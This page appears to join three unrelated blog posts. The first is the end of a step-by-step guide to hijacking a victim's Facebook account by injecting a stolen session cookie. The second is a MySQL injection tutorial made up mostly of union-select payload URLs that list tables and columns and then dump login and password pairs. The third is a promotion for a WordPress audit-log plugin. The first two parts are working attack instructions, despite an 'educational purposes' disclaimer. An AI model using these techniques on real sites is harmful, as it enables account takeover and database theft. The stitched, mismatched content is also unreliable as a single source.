Step 7 – Next right click on it and goto Copy – Bytes – Printable Text only.

Step 8 – Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.comand make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Step 10 – Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.

Understanding This Technique Called MySQL Injection

ABSTRACT

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity.
Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pros software’s for analysis and farredura vulnerabilities were unimproved by us.

Understand the technique MySQL Injection

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.

STEP BY STEP

Figure 1) Detecting.

Searching Column number (s): We will test earlier in error, then no error may be said to find.

Figure 2) SQL error.

Host Information,
Version of MySQL system used on the server.

Figure 3) Host Information.


Figure 4) Location of the files

Current database connection used between the “input” to the MySQL system.

Figure 5) Users of MySQL.

Figure 6) Current Time.

Brute Force or Shooting

This happens in versions below 5.x.y

Figure 7) Testing.

 
Dump
This happens in versions up 5.x.y [ 1º Method ] 
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) frominformation_schema.tables where table_schema=database()–

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ at line 1

<>————————<>————————-<>————————–<>

[ 2º Method ]

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 0,1–
CHARACTER_SETS
or
Unknown column ‘CHARACTER_SETS’ in ‘where clause’
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘CHARACTER_SETS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 1,2–
COLLATIONS
or
Unknown column ‘COLLATIONS’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘COLLATIONS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 16,17–
usuarios
or
Unknown column ‘usuarios’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18–
rafael
or
Unknown column ‘rafael’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,nome from usuarios–
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,churros from usuarios–
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,login from usuarios–
_Rafa_
or
Unknown column ‘_Rafa_’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios–
rafael1337
or
Unknown column ‘rafael1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1337’ at line 1

=————————–=————————–=————————–=————————–=

Dump
This happens in versions up 5.x.y [ 1º Method ] 

“usuarios” hexadecimal -> “7573756172696f73”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) frominformation_schema.columns where table_name=0x7573756172696f73–
login,passwd,id,texto
or
Unknown column ‘login,passwd,id,texto’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login,passwd,id,texto’ at line 1

<>————————<>————————-<>————————–<>

[ 2º Method ]

“usuarios” decimal -> “117,115,117,97,114,105,111,115”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 0,1–
login
or
Unknown column ‘login’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 1,2–
passwd
or
Unknown column ‘passwd’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘passwd’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 2,3–
id
or
Unknown column ‘id’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘id’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 3,4–
text
or
Unknown column ‘text’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘text’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Extracting data from the columns of a given table

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) fromusuarios–
_Rafa_ : fontes1337
or
Unknown column ‘_Rafa_ : fontes1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios–
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select
1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios–
_RHA_ : infosec1337
or
Unknown column ‘_RHA_ : infosec1337‘ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_RHA_ : infosec1337’ at line 1

=————————–=

Concat 

group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal 

0x3a => :
0x20 => space
0x2d => –
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researchs and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

Hardening WordPress Security By Monitoring Malicious User Activities

WordPress has become the most popular content management system; it drives more than 20% of the websites on the internet. Such popularity has also made WordPress a very popular hacker target, and as a matter of fact one can find ample of information about WordPress security. But although there is a lot of information about WordPress security, the WordPress security community is missing out something very important; WordPress monitoring and logging!

Why Logging and Monitoring is Important

Operating systems, network hardware and software have got log everything that is happening in a lo file or some sort of auditing database. For example Windows has the Event Viewer and Linux / Unix operating systems use syslog.

From time to time administrators analyse logs to ensure that everything is working properly and that everyone is playing by the rules, i.e. not trying to tamper the system. In fact Analysing logs helps administrators identify any suspicious behaviour, hence preventing malicious attacks.

Even in case of an attack, logs come in handy. For example if a website or server is hacked, administrators analyse the logs to track back the attack and identify the security hole the malicious hacker exploited to hack the website or server. Once the security hole has been identified administrators can work with the development team or vendor to close down the security hole to ensure that it cannot be exploited again in the future.

Management also find logs very handy because it allows them to track and monitory user activity and productivity. Monitoring of system and user activity is a must to ensure both user productivity and the security of the system.

Monitor WordPress Sites Activity

Like with any other system, keeping an audit log of the activity WordPress sites and blogs, especially WordPress multisite installations is a must if you want to ensure the security of WordPress, and also user productivity.

WP Security Audit Log

WP Security Audit Log is a free WordPress monitoring plugin that tracks all activity on WordPress and WordPress multisite websites thus enabling administrators and WordPress owners keep track of all that is happening on their WordPress to identify any suspicious behaviour and prevent malicious hack attacks.

WP Security Audit Log logs an alert each time a user logs in or out and creates, modifies or deletes existing content such as blog posts, pages and custom post types. What makes WP Security Audit Log better than other monitoring and auditing plugin are its comprehensive WordPress alerts. For example if some content is changed it does not simply issue a generic “content has been modified” alert, but specifically reports what has changed. For example it raises a different alert if a URL or category has changed, if the blog status or visibility has changed, if the author, date, page template or parent has changed and much more.

Apart from content activity it also monitors the WordPress installation and system. Below is a list of some of the activity that WP Security Audit Log monitors:

  • User profile changes; such as email, role and password changes
  • Widgets changes; for example an alert is generated if new widget is created, existing widgets are moved, modified or deleted
  • Plugin changes; an alert is generated if a new plugin is installed or if an existing one has been updated or uninstalled
  • Themes monitoring; new theme is installed or activated
  • WordPress system changes; WP Security Audit Log also monitors WordPress updates, permalinks changes, administrator notification email change, default user role etc
  • Source code changes; an alert is raised if plugin or theme files is modified

Administrators can use the Audit Log Viewer, shown in the below screenshot to view all the WordPress security alerts generated by the plugin while monitoring WordPress.

 

Detailed WordPress Alerts

As per the below screenshot each WordPress alert generated by the plugin includes information about the actual change being reported, the user’s WordPress username, avatar and role, the source IP, the date and time.

It is also possible to enable the Data Inspector from the plugin’s settings to get more details about the reported alert, such as the file triggering the alert, the user’s User Agent string etc.

From the plugin settings administrators can also enable PHP alerts, so the plugin reports any PHP errors and warnings therefore enabling administrators to also keep track of any PHP problems, typically created when a WordPress website is hacked.

It is also possible to disable any of the alerts, if for example you do not want to be alerted each time a user logs in or out, as seen in the below screenshot.

 

Delegation of WordPress Security Monitoring

By default only administrators can view the alerts, switch on or off alerts, modify alerts pruning etc. Though it is also possible to allow specific users or roles to view the alerts or modify any of the plugin settings as seen from the below screenshot.

 

WordPress Administrators Should Use WP Security Audit Log

It is impossible to track user activity and productivity, and to ensure the security of your WordPress unless you have WP Security Audit Log; therefore such plugin come in very handy especially if you have hundreds of users on your WordPress, or if you have multiple websites and a large number of users on a WordPress multisite installation.

Download WP Security Audit Log from the Official WordPress plugin repository and visit theofficial WP Security audit Log plugin page for more information about the plugin